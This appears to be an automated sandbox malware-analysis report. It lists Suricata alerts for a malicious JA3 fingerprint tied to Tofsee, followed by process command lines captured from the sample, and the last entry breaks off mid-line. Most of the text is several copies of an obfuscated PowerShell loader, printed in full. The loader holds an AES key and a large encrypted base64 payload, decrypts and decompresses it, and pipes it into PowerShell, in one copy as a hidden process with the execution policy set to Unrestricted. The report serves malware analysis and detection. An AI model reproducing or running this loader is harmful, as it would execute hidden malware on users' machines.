-
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.102:49175 -> 117.18.232.200:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.102:49176 -> 117.18.232.200:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 117.18.232.200:443 -> 192.168.56.102:49177 | 2029340 | ET INFO TLS Handshake Failure | Potentially Bad Traffic |
TCP 192.168.56.102:49179 -> 117.18.232.200:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.102:49180 -> 117.18.232.200:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 117.18.232.200:443 -> 192.168.56.102:49181 | 2029340 | ET INFO TLS Handshake Failure | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
request | GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml |
file | C:\Users\test22\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | C:\Windows\System32\cmd.exe /c powershell.exe $YmgBp = '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';$OdGbsbH = 'VmJBb0VkZHNwUVlVZ3JHaHRhaXF4SndsZ3JmdnFXaXI=';$VghnqU = New-Object 'System.Security.Cryptography.AesManaged';$VghnqU.Mode = [System.Security.Cryptography.CipherMode]::ECB;$VghnqU.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$VghnqU.BlockSize = 128;$VghnqU.KeySize = 256;$VghnqU.Key = [System.Convert]::FromBase64String($OdGbsbH);$bVTEv = [System.Convert]::FromBase64String($YmgBp);$MZAJNxgv = $bVTEv[0..15];$VghnqU.IV = $MZAJNxgv;$mcclLAtOb = $VghnqU.CreateDecryptor();$BIWUhQeeo = $mcclLAtOb.TransformFinalBlock($bVTEv, 16, $bVTEv.Length - 16);$VghnqU.Dispose();$evOYiUt = New-Object System.IO.MemoryStream( , $BIWUhQeeo );$bAepga = New-Object System.IO.MemoryStream;$fWpRphkAG = New-Object System.IO.Compression.GzipStream $evOYiUt, ([IO.Compression.CompressionMode]::Decompress);$fWpRphkAG.CopyTo( $bAepga );$fWpRphkAG.Close();$evOYiUt.Close();[byte[]] $OGFff = $bAepga.ToArray();$TAeJVf = [System.Text.Encoding]::UTF8.GetString($OGFff);$TAeJVf | powershell - |
cmdline | powershell - |
cmdline | powershell.exe -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $YmgBp = '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';$OdGbsbH = 'VmJBb0VkZHNwUVlVZ3JHaHRhaXF4SndsZ3JmdnFXaXI=';$VghnqU = New-Object 'System.Security.Cryptography.AesManaged';$VghnqU.Mode = [System.Security.Cryptography.CipherMode]::ECB;$VghnqU.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$VghnqU.BlockSize = 128;$VghnqU.KeySize = 256;$VghnqU.Key = [System.Convert]::FromBase64String($OdGbsbH);$bVTEv = [System.Convert]::FromBase64String($YmgBp);$MZAJNxgv = $bVTEv[0..15];$VghnqU.IV = $MZAJNxgv;$mcclLAtOb = $VghnqU.CreateDecryptor();$BIWUhQeeo = $mcclLAtOb.TransformFinalBlock($bVTEv, 16, $bVTEv.Length - 16);$VghnqU.Dispose();$evOYiUt = New-Object System.IO.MemoryStream( , $BIWUhQeeo );$bAepga = New-Object System.IO.MemoryStream;$fWpRphkAG = New-Object System.IO.Compression.GzipStream $evOYiUt, ([IO.Compression.CompressionMode]::Decompress);$fWpRphkAG.CopyTo( $bAepga );$fWpRphkAG.Close();$evOYiUt.Close();[byte[]] $OGFff = $bAepga.ToArray();$TAeJVf = [System.Text.Encoding]::UTF8.GetString($OGFff);$TAeJVf | powershell - } |
cmdline | powershell.exe $YmgBp = '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';$OdGbsbH = 'VmJBb0VkZHNwUVlVZ3JHaHRhaXF4SndsZ3JmdnFXaXI=';$VghnqU = New-Object 'System.Security.Cryptography.AesManaged';$VghnqU.Mode = [System.Security.Cryptography.CipherMode]::ECB;$VghnqU.Padding = 